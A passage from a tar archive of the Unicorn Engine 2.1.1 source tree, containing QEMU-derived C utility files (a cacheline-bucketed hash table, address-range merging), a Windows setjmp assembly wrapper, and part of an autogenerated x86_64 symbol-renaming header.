COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "qemu/timer.h" #include "uc_priv.h" #include "sysemu/cpus.h" #include "qemu/queue.h" int64_t qemu_clock_get_ns(QEMUClockType type) { return get_clock(); } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qht.c�����������������������������������������������������������������������0000664�0000000�0000000�00000052214�14675241067�0016074�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * qht.c - QEMU Hash Table, designed to scale for read-mostly workloads. * * Copyright (C) 2016, Emilio G. Cota <cota@braap.org> * * License: GNU GPL, version 2 or later. 
* See the COPYING file in the top-level directory. * * Assumptions: * - NULL cannot be inserted/removed as a pointer value. * - Trying to insert an already-existing hash-pointer pair is OK. However, * it is not OK to insert into the same hash table different hash-pointer * pairs that have the same pointer value, but not the hashes. * - Lookups are performed under an RCU read-critical section; removals * must wait for a grace period to elapse before freeing removed objects. * * Features: * - Reads (i.e. lookups and iterators) can be concurrent with other reads. * Lookups that are concurrent with writes to the same bucket will retry * via a seqlock; iterators acquire all bucket locks and therefore can be * concurrent with lookups and are serialized wrt writers. * - Writes (i.e. insertions/removals) can be concurrent with writes to * different buckets; writes to the same bucket are serialized through a lock. * - Optional auto-resizing: the hash table resizes up if the load surpasses * a certain threshold. Resizing is done concurrently with readers; writes * are serialized with the resize operation. * * The key structure is the bucket, which is cacheline-sized. Buckets * contain a few hash values and pointers; the u32 hash values are stored in * full so that resizing is fast. Having this structure instead of directly * chaining items has two advantages: * - Failed lookups fail fast, and touch a minimum number of cache lines. * - Resizing the hash table with concurrent lookups is easy. * * There are two types of buckets: * 1. "head" buckets are the ones allocated in the array of buckets in qht_map. * 2. all "non-head" buckets (i.e. all others) are members of a chain that * starts from a head bucket. * Note that the seqlock and spinlock of a head bucket applies to all buckets * chained to it; these two fields are unused in non-head buckets. * * On removals, we move the last valid item in the chain to the position of the * just-removed entry. This makes lookups slightly faster, since the moment an * invalid entry is found, the (failed) lookup is over. * * Resizing is done by taking all bucket spinlocks (so that no other writers can * race with us) and then copying all entries into a new hash map. Then, the * ht->map pointer is set, and the old map is freed once no RCU readers can see * it anymore. * * Writers check for concurrent resizes by comparing ht->map before and after * acquiring their bucket lock. If they don't match, a resize has occured * while the bucket spinlock was being acquired. * * Related Work: * - Idea of cacheline-sized buckets with full hashes taken from: * David, Guerraoui & Trigonakis, "Asynchronized Concurrency: * The Secret to Scaling Concurrent Search Data Structures", ASPLOS'15. * - Why not RCU-based hash tables? They would allow us to get rid of the * seqlock, but resizing would take forever since RCU read critical * sections in QEMU take quite a long time. * More info on relativistic hash tables: * + Triplett, McKenney & Walpole, "Resizable, Scalable, Concurrent Hash * Tables via Relativistic Programming", USENIX ATC'11. * + Corbet, "Relativistic hash tables, part 1: Algorithms", @ lwn.net, 2014. * https://lwn.net/Articles/612021/ */ #include "qemu/osdep.h" #include "qemu/qht.h" #include "qemu/atomic.h" //#include "qemu/rcu.h" //#define QHT_DEBUG /* * We want to avoid false sharing of cache lines. Most systems have 64-byte * cache lines so we go with it for simplicity. 
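 *
 * With 64-bit pointers that budget works out as follows: four 4-byte
 * hashes, four 8-byte pointers and one 8-byte next pointer come to
 * 56 bytes, so a bucket (QHT_BUCKET_ENTRIES == 4) fits in a single
 * 64-byte line; the 32-bit layout packs six entries for the same reason.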
/*
 * We want to avoid false sharing of cache lines. Most systems have 64-byte
 * cache lines so we go with it for simplicity.
 *
 * Note that systems with smaller cache lines will be fine (the struct is
 * almost 64-bytes); systems with larger cache lines might suffer from
 * some false sharing.
 */
#define QHT_BUCKET_ALIGN 64

/* define these to keep sizeof(qht_bucket) within QHT_BUCKET_ALIGN */
#if HOST_LONG_BITS == 32
#define QHT_BUCKET_ENTRIES 6
#else /* 64-bit */
#define QHT_BUCKET_ENTRIES 4
#endif

enum qht_iter_type {
    QHT_ITER_VOID,    /* do nothing; use retvoid */
    QHT_ITER_RM,      /* remove element if retbool returns true */
};

struct qht_iter {
    union {
        qht_iter_func_t retvoid;
        qht_iter_bool_func_t retbool;
    } f;
    enum qht_iter_type type;
};

/*
 * Note: reading partially-updated pointers in @pointers could lead to
 * segfaults. We thus access them with atomic_read/set; this guarantees
 * that the compiler makes all those accesses atomic. We also need the
 * volatile-like behavior in atomic_read, since otherwise the compiler
 * might refetch the pointer.
 * atomic_read's are of course not necessary when the bucket lock is held.
 *
 * If both ht->lock and b->lock are grabbed, ht->lock should always
 * be grabbed first.
 */
struct qht_bucket {
    uint32_t hashes[QHT_BUCKET_ENTRIES];
    void *pointers[QHT_BUCKET_ENTRIES];
    struct qht_bucket *next;
} QEMU_ALIGNED(QHT_BUCKET_ALIGN);

QEMU_BUILD_BUG_ON(sizeof(struct qht_bucket) > QHT_BUCKET_ALIGN);

/**
 * struct qht_map - structure to track an array of buckets
 * @rcu: used by RCU. Keep it as the top field in the struct to help valgrind
 *       find the whole struct.
 * @buckets: array of head buckets. It is constant once the map is created.
 * @n_buckets: number of head buckets. It is constant once the map is created.
 * @n_added_buckets: number of added (i.e. "non-head") buckets
 * @n_added_buckets_threshold: threshold to trigger an upward resize once the
 *                             number of added buckets surpasses it.
 *
 * Buckets are tracked in what we call a "map", i.e. this structure.
 */
struct qht_map {
    struct qht_bucket *buckets;
    size_t n_buckets;
    size_t n_added_buckets;
    size_t n_added_buckets_threshold;
};

/* trigger a resize when n_added_buckets > n_buckets / div */
#define QHT_NR_ADDED_BUCKETS_THRESHOLD_DIV 8

static void qht_do_resize_reset(struct uc_struct *uc, struct qht *ht,
                                struct qht_map *new, bool reset);
static void qht_grow_maybe(struct uc_struct *uc, struct qht *ht);

#define qht_debug_assert(X) do { (void)(X); } while (0)

static inline size_t qht_elems_to_buckets(size_t n_elems)
{
    return pow2ceil(n_elems / QHT_BUCKET_ENTRIES);
}

static inline void qht_head_init(struct qht_bucket *b)
{
    memset(b, 0, sizeof(*b));
}

static inline
struct qht_bucket *qht_map_to_bucket(const struct qht_map *map, uint32_t hash)
{
    return &map->buckets[hash & (map->n_buckets - 1)];
}
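/*
 * Editor's worked example -- not part of the upstream file.
 * qht_map_to_bucket() relies on n_buckets being a power of two, which
 * qht_elems_to_buckets() guarantees via pow2ceil(); the AND mask then
 * selects the low-order hash bits:
 *
 *     n_buckets = 8       ->  mask = n_buckets - 1 = 0b111
 *     hash = 47 (0x2f)    ->  head bucket index = 47 & 7 = 7
 */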
/*
 * Grab all bucket locks, and set @pmap after making sure the map isn't stale.
 *
 * Pairs with qht_map_unlock_buckets(), hence the pass-by-reference.
 *
 * Note: callers cannot have ht->lock held.
 */
static inline
void qht_map_lock_buckets__no_stale(struct qht *ht, struct qht_map **pmap)
{
    struct qht_map *map;

    map = ht->map;
    *pmap = map;
    return;
}

/*
 * Get a head bucket and lock it, making sure its parent map is not stale.
 * @pmap is filled with a pointer to the bucket's parent map.
 */
static inline
struct qht_bucket *qht_bucket_lock__no_stale(struct qht *ht, uint32_t hash,
                                             struct qht_map **pmap)
{
    struct qht_bucket *b;
    struct qht_map *map;

    map = ht->map;
    b = qht_map_to_bucket(map, hash);
    *pmap = map;
    return b;
}

static inline bool qht_map_needs_resize(const struct qht_map *map)
{
    return map->n_added_buckets > map->n_added_buckets_threshold;
}

static inline void qht_chain_destroy(const struct qht_bucket *head)
{
    struct qht_bucket *curr = head->next;
    struct qht_bucket *prev;

    while (curr) {
        prev = curr;
        curr = curr->next;
        qemu_vfree(prev);
    }
}

/* pass only an orphan map */
static void qht_map_destroy(struct qht_map *map)
{
    size_t i;

    for (i = 0; i < map->n_buckets; i++) {
        qht_chain_destroy(&map->buckets[i]);
    }
    qemu_vfree(map->buckets);
    g_free(map);
}

static struct qht_map *qht_map_create(size_t n_buckets)
{
    struct qht_map *map;
    size_t i;

    map = g_malloc(sizeof(*map));

    map->n_buckets = n_buckets;

    map->n_added_buckets = 0;
    map->n_added_buckets_threshold = n_buckets /
        QHT_NR_ADDED_BUCKETS_THRESHOLD_DIV;
    /* let tiny hash tables add at least one non-head bucket */
    if (unlikely(map->n_added_buckets_threshold == 0)) {
        map->n_added_buckets_threshold = 1;
    }

    map->buckets = qemu_memalign(QHT_BUCKET_ALIGN,
                                 sizeof(*map->buckets) * n_buckets);
    for (i = 0; i < n_buckets; i++) {
        qht_head_init(&map->buckets[i]);
    }
    return map;
}

void qht_init(struct qht *ht, qht_cmp_func_t cmp, size_t n_elems,
              unsigned int mode)
{
    struct qht_map *map;
    size_t n_buckets = qht_elems_to_buckets(n_elems);

    g_assert(cmp);
    ht->cmp = cmp;
    ht->mode = mode;
    map = qht_map_create(n_buckets);
    ht->map = map;
}

/* call only when there are no readers/writers left */
void qht_destroy(struct qht *ht)
{
    qht_map_destroy(ht->map);
    memset(ht, 0, sizeof(*ht));
}

static void qht_bucket_reset__locked(struct qht_bucket *head)
{
    struct qht_bucket *b = head;
    int i;

    do {
        for (i = 0; i < QHT_BUCKET_ENTRIES; i++) {
            if (b->pointers[i] == NULL) {
                goto done;
            }
            b->hashes[i] = 0;
            b->pointers[i] = NULL;
        }
        b = b->next;
    } while (b);
 done:
    return;
}

/* call with all bucket locks held */
static void qht_map_reset__all_locked(struct qht_map *map)
{
    size_t i;

    for (i = 0; i < map->n_buckets; i++) {
        qht_bucket_reset__locked(&map->buckets[i]);
    }
}

void qht_reset(struct qht *ht)
{
    struct qht_map *map;

    qht_map_lock_buckets__no_stale(ht, &map);
    qht_map_reset__all_locked(map);
}

static inline void qht_do_resize(struct uc_struct *uc, struct qht *ht,
                                 struct qht_map *new)
{
    qht_do_resize_reset(uc, ht, new, false);
}

static inline void qht_do_resize_and_reset(struct uc_struct *uc,
                                           struct qht *ht, struct qht_map *new)
{
    qht_do_resize_reset(uc, ht, new, true);
}

bool qht_reset_size(struct uc_struct *uc, struct qht *ht, size_t n_elems)
{
    struct qht_map *new = NULL;
    struct qht_map *map;
    size_t n_buckets;

    n_buckets = qht_elems_to_buckets(n_elems);

    map = ht->map;
    if (n_buckets != map->n_buckets) {
        new = qht_map_create(n_buckets);
    }
    qht_do_resize_and_reset(uc, ht, new);

    return !!new;
}

static inline
void *qht_do_lookup(struct uc_struct *uc, const struct qht_bucket *head,
                    qht_lookup_func_t func, const void *userp, uint32_t hash)
{
    const struct qht_bucket *b = head;
    int i;

    do {
        for (i = 0; i < QHT_BUCKET_ENTRIES; i++) {
            if (b->hashes[i] == hash) {
                void *p = b->pointers[i];

                if (likely(p) && likely(func(uc, p, userp))) {
                    return p;
                }
            }
        }
        b = b->next;
    } while (b);

    return NULL;
}
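/*
 * Editor's note -- not part of the upstream file. Comparing the stored
 * 32-bit hash before calling func() is what makes failed lookups cheap:
 * a non-matching entry is rejected without dereferencing its pointer or
 * running the caller's comparison callback.
 */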
void *qht_lookup_custom(struct uc_struct *uc, const struct qht *ht,
                        const void *userp, uint32_t hash,
                        qht_lookup_func_t func)
{
    const struct qht_bucket *b;
    const struct qht_map *map;
    void *ret;

    map = ht->map;
    b = qht_map_to_bucket(map, hash);

    ret = qht_do_lookup(uc, b, func, userp, hash);
    return ret;
}

void *qht_lookup(struct uc_struct *uc, const struct qht *ht, const void *userp,
                 uint32_t hash)
{
    return qht_lookup_custom(uc, ht, userp, hash, ht->cmp);
}

/*
 * call with head->lock held
 * @ht is const since it is only used for ht->cmp()
 */
static void *qht_insert__locked(struct uc_struct *uc, const struct qht *ht,
                                struct qht_map *map, struct qht_bucket *head,
                                void *p, uint32_t hash, bool *needs_resize)
{
    struct qht_bucket *b = head;
    struct qht_bucket *prev = NULL;
    struct qht_bucket *new = NULL;
    int i;

    do {
        for (i = 0; i < QHT_BUCKET_ENTRIES; i++) {
            if (b->pointers[i]) {
                if (unlikely(b->hashes[i] == hash &&
                             ht->cmp(uc, b->pointers[i], p))) {
                    return b->pointers[i];
                }
            } else {
                goto found;
            }
        }
        prev = b;
        b = b->next;
    } while (b);

    b = qemu_memalign(QHT_BUCKET_ALIGN, sizeof(*b));
    memset(b, 0, sizeof(*b));
    new = b;
    i = 0;
    map->n_added_buckets++;
    if (unlikely(qht_map_needs_resize(map)) && needs_resize) {
        *needs_resize = true;
    }

 found:
    /* found an empty key: acquire the seqlock and write */
    if (new) {
        prev->next = b;
    }
    b->hashes[i] = hash;
    b->pointers[i] = p;
    return NULL;
}

#ifdef _MSC_VER
static void qht_grow_maybe(struct uc_struct *uc, struct qht *ht)
#else
static __attribute__((noinline)) void qht_grow_maybe(struct uc_struct *uc,
                                                     struct qht *ht)
#endif
{
    struct qht_map *map;

    map = ht->map;
    /* another thread might have just performed the resize we were after */
    if (qht_map_needs_resize(map)) {
        struct qht_map *new = qht_map_create(map->n_buckets * 2);

        qht_do_resize(uc, ht, new);
    }
}

bool qht_insert(struct uc_struct *uc, struct qht *ht, void *p, uint32_t hash,
                void **existing)
{
    struct qht_bucket *b;
    struct qht_map *map;
    bool needs_resize = false;
    void *prev;

    /* NULL pointers are not supported */
    qht_debug_assert(p);

    b = qht_bucket_lock__no_stale(ht, hash, &map);
    prev = qht_insert__locked(uc, ht, map, b, p, hash, &needs_resize);

    if (unlikely(needs_resize) && ht->mode & QHT_MODE_AUTO_RESIZE) {
        qht_grow_maybe(uc, ht);
    }
    if (likely(prev == NULL)) {
        return true;
    }
    if (existing) {
        *existing = prev;
    }
    return false;
}

static inline bool qht_entry_is_last(const struct qht_bucket *b, int pos)
{
    if (pos == QHT_BUCKET_ENTRIES - 1) {
        if (b->next == NULL) {
            return true;
        }
        return b->next->pointers[0] == NULL;
    }
    return b->pointers[pos + 1] == NULL;
}

static void
qht_entry_move(struct qht_bucket *to, int i, struct qht_bucket *from, int j)
{
    qht_debug_assert(!(to == from && i == j));
    qht_debug_assert(to->pointers[i]);
    qht_debug_assert(from->pointers[j]);

    to->hashes[i] = from->hashes[j];
    to->pointers[i] = from->pointers[j];

    from->hashes[j] = 0;
    from->pointers[j] = NULL;
}
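/*
 * Editor's illustration -- not part of the upstream file. The removal
 * strategy implemented by qht_bucket_remove_entry() below keeps valid
 * entries packed at the front of the chain, so lookups may stop at the
 * first NULL pointer. Removing B when D is the last valid entry:
 *
 *     before:  [A][B][C][D][NULL] ...
 *     after:   [A][D][C][NULL][NULL] ...
 */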
/*
 * Find the last valid entry in @orig, and swap it with @orig[pos], which has
 * just been invalidated.
 */
static inline void qht_bucket_remove_entry(struct qht_bucket *orig, int pos)
{
    struct qht_bucket *b = orig;
    struct qht_bucket *prev = NULL;
    int i;

    if (qht_entry_is_last(orig, pos)) {
        orig->hashes[pos] = 0;
        orig->pointers[pos] = NULL;
        return;
    }
    do {
        for (i = 0; i < QHT_BUCKET_ENTRIES; i++) {
            if (b->pointers[i]) {
                continue;
            }
            if (i > 0) {
                qht_entry_move(orig, pos, b, i - 1);
                return;
            }
            qht_debug_assert(prev);
            qht_entry_move(orig, pos, prev, QHT_BUCKET_ENTRIES - 1);
            return;
        }
        prev = b;
        b = b->next;
    } while (b);
    /* no free entries other than orig[pos], so swap it with the last one */
    qht_entry_move(orig, pos, prev, QHT_BUCKET_ENTRIES - 1);
}

/* call with b->lock held */
static inline
bool qht_remove__locked(struct qht_bucket *head, const void *p, uint32_t hash)
{
    struct qht_bucket *b = head;
    int i;

    do {
        for (i = 0; i < QHT_BUCKET_ENTRIES; i++) {
            void *q = b->pointers[i];

            if (unlikely(q == NULL)) {
                return false;
            }
            if (q == p) {
                qht_debug_assert(b->hashes[i] == hash);
                qht_bucket_remove_entry(b, i);
                return true;
            }
        }
        b = b->next;
    } while (b);
    return false;
}

bool qht_remove(struct qht *ht, const void *p, uint32_t hash)
{
    struct qht_bucket *b;
    struct qht_map *map;
    bool ret;

    /* NULL pointers are not supported */
    qht_debug_assert(p);

    b = qht_bucket_lock__no_stale(ht, hash, &map);
    ret = qht_remove__locked(b, p, hash);
    return ret;
}

static inline void qht_bucket_iter(struct uc_struct *uc,
                                   struct qht_bucket *head,
                                   const struct qht_iter *iter, void *userp)
{
    struct qht_bucket *b = head;
    int i;

    do {
        for (i = 0; i < QHT_BUCKET_ENTRIES; i++) {
            if (b->pointers[i] == NULL) {
                return;
            }
            switch (iter->type) {
            case QHT_ITER_VOID:
                iter->f.retvoid(uc, b->pointers[i], b->hashes[i], userp);
                break;
            case QHT_ITER_RM:
                if (iter->f.retbool(b->pointers[i], b->hashes[i], userp)) {
                    /* replace i with the last valid element in the bucket */
                    qht_bucket_remove_entry(b, i);
                    /* reevaluate i, since it just got replaced */
                    i--;
                    continue;
                }
                break;
            default:
                g_assert_not_reached();
            }
        }
        b = b->next;
    } while (b);
}

/* call with all of the map's locks held */
static inline void qht_map_iter__all_locked(struct uc_struct *uc,
                                            struct qht_map *map,
                                            const struct qht_iter *iter,
                                            void *userp)
{
    size_t i;

    for (i = 0; i < map->n_buckets; i++) {
        qht_bucket_iter(uc, &map->buckets[i], iter, userp);
    }
}

static inline void do_qht_iter(struct uc_struct *uc, struct qht *ht,
                               const struct qht_iter *iter, void *userp)
{
    struct qht_map *map;

    map = ht->map;
    qht_map_iter__all_locked(uc, map, iter, userp);
}

void qht_iter(struct uc_struct *uc, struct qht *ht, qht_iter_func_t func,
              void *userp)
{
    const struct qht_iter iter = {
        .f.retvoid = func,
        .type = QHT_ITER_VOID,
    };

    do_qht_iter(uc, ht, &iter, userp);
}

void qht_iter_remove(struct uc_struct *uc, struct qht *ht,
                     qht_iter_bool_func_t func, void *userp)
{
    const struct qht_iter iter = {
        .f.retbool = func,
        .type = QHT_ITER_RM,
    };

    do_qht_iter(uc, ht, &iter, userp);
}

struct qht_map_copy_data {
    struct qht *ht;
    struct qht_map *new;
};

static void qht_map_copy(struct uc_struct *uc, void *p, uint32_t hash,
                         void *userp)
{
    struct qht_map_copy_data *data = userp;
    struct qht *ht = data->ht;
    struct qht_map *new = data->new;
    struct qht_bucket *b = qht_map_to_bucket(new, hash);

    /* no need to acquire b->lock because no thread has seen this map yet */
    qht_insert__locked(uc, ht, new, b, p, hash, NULL);
}
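/*
 * Editor's worked example -- not part of the upstream file. With
 * QHT_NR_ADDED_BUCKETS_THRESHOLD_DIV == 8, a map with 1024 head buckets has
 * a threshold of 128: once more than 128 overflow buckets have been added,
 * qht_grow_maybe() doubles the map to 2048 head buckets and the entries are
 * copied over by the resize path below.
 */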
/*
 * Atomically perform a resize and/or reset.
 * Call with ht->lock held.
 */
static void qht_do_resize_reset(struct uc_struct *uc, struct qht *ht,
                                struct qht_map *new, bool reset)
{
    struct qht_map *old;
    const struct qht_iter iter = {
        .f.retvoid = qht_map_copy,
        .type = QHT_ITER_VOID,
    };
    struct qht_map_copy_data data;

    old = ht->map;

    if (reset) {
        qht_map_reset__all_locked(old);
    }

    if (new == NULL) {
        return;
    }

    g_assert(new->n_buckets != old->n_buckets);
    data.ht = ht;
    data.new = new;
    qht_map_iter__all_locked(uc, old, &iter, &data);

    ht->map = new;
    qht_map_destroy(old);
}

bool qht_resize(struct uc_struct *uc, struct qht *ht, size_t n_elems)
{
    size_t n_buckets = qht_elems_to_buckets(n_elems);
    size_t ret = false;

    if (n_buckets != ht->map->n_buckets) {
        struct qht_map *new;

        new = qht_map_create(n_buckets);
        qht_do_resize(uc, ht, new);
        ret = true;
    }

    return ret;
}

/* pass @stats to qht_statistics_destroy() when done */
void qht_statistics_init(const struct qht *ht, struct qht_stats *stats)
{
    const struct qht_map *map;
    int i;

    map = ht->map;

    stats->used_head_buckets = 0;
    stats->entries = 0;
    qdist_init(&stats->chain);
    qdist_init(&stats->occupancy);

    /* bail out if the qht has not yet been initialized */
    if (unlikely(map == NULL)) {
        stats->head_buckets = 0;
        return;
    }
    stats->head_buckets = map->n_buckets;

    for (i = 0; i < map->n_buckets; i++) {
        const struct qht_bucket *head = &map->buckets[i];
        const struct qht_bucket *b;
        size_t buckets;
        size_t entries;
        int j;

        buckets = 0;
        entries = 0;
        b = head;
        do {
            for (j = 0; j < QHT_BUCKET_ENTRIES; j++) {
                if (b->pointers[j] == NULL) {
                    break;
                }
                entries++;
            }
            buckets++;
            b = b->next;
        } while (b);

        if (entries) {
            qdist_inc(&stats->chain, buckets);
            qdist_inc(&stats->occupancy,
                      (double)entries / QHT_BUCKET_ENTRIES / buckets);
            stats->used_head_buckets++;
            stats->entries += entries;
        } else {
            qdist_inc(&stats->occupancy, 0);
        }
    }
}

void qht_statistics_destroy(struct qht_stats *stats)
{
    qdist_destroy(&stats->occupancy);
    qdist_destroy(&stats->chain);
}

unicorn-2.1.1/qemu/util/range.c

/*
 * QEMU 64-bit address ranges
 *
 * Copyright (c) 2015-2016 Red Hat, Inc.
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "qemu/range.h"

/*
 * Return -1 if @a < @b, 1 if @a > @b, and 0 if they touch or overlap.
 * Both @a and @b must not be empty.
 */
static inline int range_compare(Range *a, Range *b)
{
    assert(!range_is_empty(a) && !range_is_empty(b));

    /* Careful, avoid wraparound */
    if (b->lob && b->lob - 1 > a->upb) {
        return -1;
    }
    if (a->lob && a->lob - 1 > b->upb) {
        return 1;
    }
    return 0;
}

/* Insert @data into @list of ranges; caller no longer owns @data */
GList *range_list_insert(GList *list, Range *data)
{
    GList *l;

    assert(!range_is_empty(data));

    /* Skip all list elements strictly less than data */
    for (l = list; l && range_compare(l->data, data) < 0; l = l->next) {
    }

    if (!l || range_compare(l->data, data) > 0) {
        /* Rest of the list (if any) is strictly greater than @data */
        return g_list_insert_before(list, l, data);
    }

    /* Current list element overlaps @data, merge the two */
    range_extend(l->data, data);
    g_free(data);

    /* Merge any subsequent list elements that now also overlap */
    while (l->next && range_compare(l->data, l->next->data) == 0) {
#ifndef NDEBUG
        GList *new_l;
#endif
        range_extend(l->data, l->next->data);
        g_free(l->next->data);
#ifndef NDEBUG
        new_l = g_list_delete_link(list, l->next);
        assert(new_l == list);
#else
        g_list_delete_link(list, l->next);
#endif
    }
    return list;
}
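/*
 * Editor's worked example -- not part of the upstream file. Because
 * range_compare() also returns 0 for ranges that merely touch, the insert
 * path merges adjacent ranges: for [0,9] and [10,19], b->lob - 1 == 9 is
 * not greater than a->upb == 9, so the two compare equal and range_extend()
 * combines them into [0,19].
 */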
unicorn-2.1.1/qemu/util/setjmp-wrapper-win32.asm

EXTERN _setjmp: proc
PUBLIC _setjmp_wrapper

_TEXT SEGMENT

_setjmp_wrapper PROC

; Why do we need this wrapper?
; Short answer: Windows' default implementation of setjmp/longjmp is incompatible with generated code.
; A longer answer: https://blog.lazym.io/2020/09/21/Unicorn-Devblog-setjmp-longjmp-on-Windows/.
; From qemu os-win32 comments:
; > On w64, setjmp is implemented by _setjmp which needs a second parameter.
; > If this parameter is NULL, longjump does no stack unwinding.
; > That is what we need for QEMU. Passing the value of register rsp (default)
; > lets longjmp try a stack unwinding which will crash with generated code.
; That is indeed true, but MSVC doesn't expose a setjmp signature that receives two arguments.
; Therefore, we add a wrapper to keep the second argument zero.
xor rdx, rdx
jmp _setjmp

_setjmp_wrapper ENDP

_TEXT ENDS

END

unicorn-2.1.1/qemu/vl.h

#ifndef VL_H_
#define VL_H_
int machine_initialize(struct uc_struct *uc);
#endif

unicorn-2.1.1/qemu/x86_64.h

/* Autogen header for Unicorn Engine - DO NOT MODIFY */
#ifndef UNICORN_AUTOGEN_x86_64_H
#define UNICORN_AUTOGEN_x86_64_H

#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _x86_64
#endif

#define unicorn_fill_tlb unicorn_fill_tlb_x86_64 #define reg_read reg_read_x86_64 #define reg_write reg_write_x86_64 #define uc_init uc_init_x86_64 #define uc_add_inline_hook uc_add_inline_hook_x86_64 #define uc_del_inline_hook uc_del_inline_hook_x86_64 #define tb_invalidate_phys_range tb_invalidate_phys_range_x86_64 #define use_idiv_instructions use_idiv_instructions_x86_64 #define arm_arch arm_arch_x86_64 #define tb_target_set_jmp_target tb_target_set_jmp_target_x86_64 #define have_bmi1 have_bmi1_x86_64 #define have_popcnt have_popcnt_x86_64 #define have_avx1 have_avx1_x86_64 #define have_avx2 have_avx2_x86_64 #define have_isa have_isa_x86_64 #define have_altivec have_altivec_x86_64 #define have_vsx have_vsx_x86_64 #define flush_icache_range flush_icache_range_x86_64 #define s390_facilities s390_facilities_x86_64 #define tcg_dump_op tcg_dump_op_x86_64 #define tcg_dump_ops tcg_dump_ops_x86_64 #define tcg_gen_and_i64 tcg_gen_and_i64_x86_64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_x86_64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_x86_64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_x86_64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_x86_64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_x86_64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_x86_64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_x86_64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_x86_64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_x86_64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_x86_64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_x86_64 #define tcg_gen_or_i64 tcg_gen_or_i64_x86_64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_x86_64 #define
tcg_gen_shl_i64 tcg_gen_shl_i64_x86_64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_x86_64 #define tcg_gen_st_i64 tcg_gen_st_i64_x86_64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_x86_64 #define cpu_icount_to_ns cpu_icount_to_ns_x86_64 #define cpu_is_stopped cpu_is_stopped_x86_64 #define cpu_get_ticks cpu_get_ticks_x86_64 #define cpu_get_clock cpu_get_clock_x86_64 #define cpu_resume cpu_resume_x86_64 #define qemu_init_vcpu qemu_init_vcpu_x86_64 #define cpu_stop_current cpu_stop_current_x86_64 #define resume_all_vcpus resume_all_vcpus_x86_64 #define vm_start vm_start_x86_64 #define address_space_dispatch_compact address_space_dispatch_compact_x86_64 #define flatview_translate flatview_translate_x86_64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_x86_64 #define qemu_get_cpu qemu_get_cpu_x86_64 #define cpu_address_space_init cpu_address_space_init_x86_64 #define cpu_get_address_space cpu_get_address_space_x86_64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_x86_64 #define cpu_exec_initfn cpu_exec_initfn_x86_64 #define cpu_exec_realizefn cpu_exec_realizefn_x86_64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_x86_64 #define cpu_watchpoint_insert cpu_watchpoint_insert_x86_64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_x86_64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_x86_64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_x86_64 #define cpu_breakpoint_insert cpu_breakpoint_insert_x86_64 #define cpu_breakpoint_remove cpu_breakpoint_remove_x86_64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_x86_64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_x86_64 #define cpu_abort cpu_abort_x86_64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_x86_64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_x86_64 #define flatview_add_to_dispatch flatview_add_to_dispatch_x86_64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_x86_64 #define qemu_ram_get_offset qemu_ram_get_offset_x86_64 #define qemu_ram_get_used_length qemu_ram_get_used_length_x86_64 #define qemu_ram_is_shared qemu_ram_is_shared_x86_64 #define qemu_ram_pagesize qemu_ram_pagesize_x86_64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_x86_64 #define qemu_ram_alloc qemu_ram_alloc_x86_64 #define qemu_ram_free qemu_ram_free_x86_64 #define qemu_map_ram_ptr qemu_map_ram_ptr_x86_64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_x86_64 #define qemu_ram_block_from_host qemu_ram_block_from_host_x86_64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_x86_64 #define cpu_check_watchpoint cpu_check_watchpoint_x86_64 #define iotlb_to_section iotlb_to_section_x86_64 #define address_space_dispatch_new address_space_dispatch_new_x86_64 #define address_space_dispatch_free address_space_dispatch_free_x86_64 #define flatview_read_continue flatview_read_continue_x86_64 #define address_space_read_full address_space_read_full_x86_64 #define address_space_write address_space_write_x86_64 #define address_space_rw address_space_rw_x86_64 #define cpu_physical_memory_rw cpu_physical_memory_rw_x86_64 #define address_space_write_rom address_space_write_rom_x86_64 #define cpu_flush_icache_range cpu_flush_icache_range_x86_64 #define cpu_exec_init_all cpu_exec_init_all_x86_64 #define address_space_access_valid address_space_access_valid_x86_64 #define address_space_map address_space_map_x86_64 #define address_space_unmap address_space_unmap_x86_64 #define 
